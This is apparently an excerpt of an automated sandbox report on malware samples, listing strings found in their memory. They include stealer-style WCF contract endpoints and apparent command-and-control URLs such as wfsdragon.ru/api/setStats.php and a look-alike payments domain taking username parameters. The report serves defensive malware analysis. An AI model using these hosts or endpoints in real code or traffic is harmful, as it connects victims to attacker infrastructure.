                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionScannedFiles
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/InitDisplayResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/InitLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/InitResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/InitResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/SetEnvironment
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/SetEnvironmentLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/SetEnvironmentResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/SetEnvironmentResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdate
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdateLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdateResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdateResponseH9
                  Source: Amcache.hve.30.drString found in binary or memory: http://upx.sf.net
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru/
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru/api/setStats.php
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru/api/setStats.php2
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru:80/api/setStats.php
                  Source: explorer.exe, 0000002F.00000000.1918788309.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4182753346.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                  Source: explorer.exe, 0000002F.00000002.4164547878.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                  Source: explorer.exe, 0000002F.00000002.4164547878.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_1
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_2
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_3
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_4
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_5
